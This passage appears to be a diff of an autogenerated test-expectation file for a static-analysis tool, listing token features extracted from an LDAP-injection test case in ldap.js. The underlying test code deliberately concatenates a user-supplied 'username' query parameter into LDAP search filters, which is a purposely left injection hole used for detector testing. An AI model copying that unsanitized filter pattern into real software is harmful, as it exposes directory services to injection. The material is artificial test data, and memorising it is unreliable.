exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | exceptional return of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | exceptional return of anonymous function | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | functio ... res) {} | CalleeFlexibleAccessPath | client.search | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | functio ... res) {} | InputArgumentIndex | 2 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | functio ... res) {} | calleeImports | ldapjs | @@ -1017,6 +5523,46 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | functio ... res) {} | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | functio ... res) {} | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | functio ... res) {} | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | return of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | return of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | return of anonymous function | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:47:28:49 | err | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:47:28:49 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:47:28:49 | err | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:47:28:49 | err | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:47:28:49 | err | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:52:28:54 | res | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:52:28:54 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:52:28:54 | res | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:52:28:54 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:52:28:54 | res | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:30:8 | client | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:30:8 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:30:8 | client | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:30:8 | client | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:30:8 | client | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:30:15 | client.search | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:30:15 | client.search | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:30:15 | client.search | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:30:15 | client.search | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:30:15 | client.search | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:34:3 | client. ... {}\\n ) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:34:3 | client. ... {}\\n ) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:34:3 | client. ... {}\\n ) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:34:3 | client. ... {}\\n ) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:34:3 | client. ... {}\\n ) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:34:3 | exceptional return of client. ... {}\\n ) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:34:3 | exceptional return of client. ... {}\\n ) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:34:3 | exceptional return of client. ... {}\\n ) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:34:3 | exceptional return of client. ... {}\\n ) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:3:34:3 | exceptional return of client. ... {}\\n ) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:10:30:15 | search | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:10:30:15 | search | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:10:30:15 | search | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:10:30:15 | search | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:30:10:30:15 | search | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:31:5:31:15 | "o=example" | CalleeFlexibleAccessPath | client.search | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:31:5:31:15 | "o=example" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:31:5:31:15 | "o=example" | calleeImports | ldapjs | @@ -1035,6 +5581,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:5:32:61 | { filte ... e}))` } | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:5:32:61 | { filte ... e}))` } | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:5:32:61 | { filte ... e}))` } | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:7:32:12 | filter | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:7:32:12 | filter | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:7:32:12 | filter | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:7:32:12 | filter | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:7:32:12 | filter | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:7:32:59 | filter: ... ame}))` | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:7:32:59 | filter: ... ame}))` | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:7:32:59 | filter: ... ame}))` | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:7:32:59 | filter: ... ame}))` | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:7:32:59 | filter: ... ame}))` | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:7:32:59 | filter: ... ame}))` | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:7:32:59 | filter: ... ame}))` | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:7:32:59 | filter: ... ame}))` | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:7:32:59 | filter: ... ame}))` | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:7:32:59 | filter: ... ame}))` | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:15:32:59 | `(\|(nam ... ame}))` | CalleeFlexibleAccessPath | client.search | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:15:32:59 | `(\|(nam ... ame}))` | InputAccessPathFromCallee | 1.filter | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:15:32:59 | `(\|(nam ... ame}))` | InputArgumentIndex | 1 | @@ -1045,6 +5606,51 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:15:32:59 | `(\|(nam ... ame}))` | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:15:32:59 | `(\|(nam ... ame}))` | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:15:32:59 | `(\|(nam ... ame}))` | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:16:32:23 | (\|(name= | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:16:32:23 | (\|(name= | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:16:32:23 | (\|(name= | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:16:32:23 | (\|(name= | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:16:32:23 | (\|(name= | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:16:32:23 | (\|(name= | stringConcatenatedWith | -endpoint- username + ')(username=' + username + '))' | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:26:32:33 | username | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:26:32:33 | username | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:26:32:33 | username | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:26:32:33 | username | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:26:32:33 | username | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:26:32:33 | username | stringConcatenatedWith | '(\|(name=' -endpoint- ')(username=' + username + '))' | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:35:32:45 | )(username= | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:35:32:45 | )(username= | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:35:32:45 | )(username= | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:35:32:45 | )(username= | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:35:32:45 | )(username= | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:35:32:45 | )(username= | stringConcatenatedWith | '(\|(name=' + username -endpoint- username + '))' | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:48:32:55 | username | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:48:32:55 | username | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:48:32:55 | username | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:48:32:55 | username | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:48:32:55 | username | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:48:32:55 | username | stringConcatenatedWith | '(\|(name=' + username + ')(username=' -endpoint- '))' | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:57:32:58 | )) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:57:32:58 | )) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:57:32:58 | )) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:57:32:58 | )) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:57:32:58 | )) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:32:57:32:58 | )) | stringConcatenatedWith | '(\|(name=' + username + ')(username=' + username -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:4 | this | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:4 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:4 | this | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:4 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:4 | this | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | 'arguments' object of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | 'arguments' object of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | 'arguments' object of anonymous function | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | exceptional return of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | exceptional return of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | exceptional return of anonymous function | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | functio ... res) {} | CalleeFlexibleAccessPath | client.search | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | functio ... res) {} | InputArgumentIndex | 2 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | functio ... res) {} | calleeImports | ldapjs | @@ -1054,6 +5660,46 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | functio ... res) {} | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | functio ... res) {} | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | functio ... res) {} | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | return of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | return of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:5:33:26 | return of anonymous function | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:15:33:17 | err | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:15:33:17 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:15:33:17 | err | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:15:33:17 | err | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:15:33:17 | err | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:20:33:22 | res | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:20:33:22 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:20:33:22 | res | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:20:33:22 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:33:20:33:22 | res | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:37:8 | client | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:37:8 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:37:8 | client | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:37:8 | client | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:37:8 | client | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:37:15 | client.search | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:37:15 | client.search | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:37:3:37:15 | client.search | enclosingFunctionBody | req res q 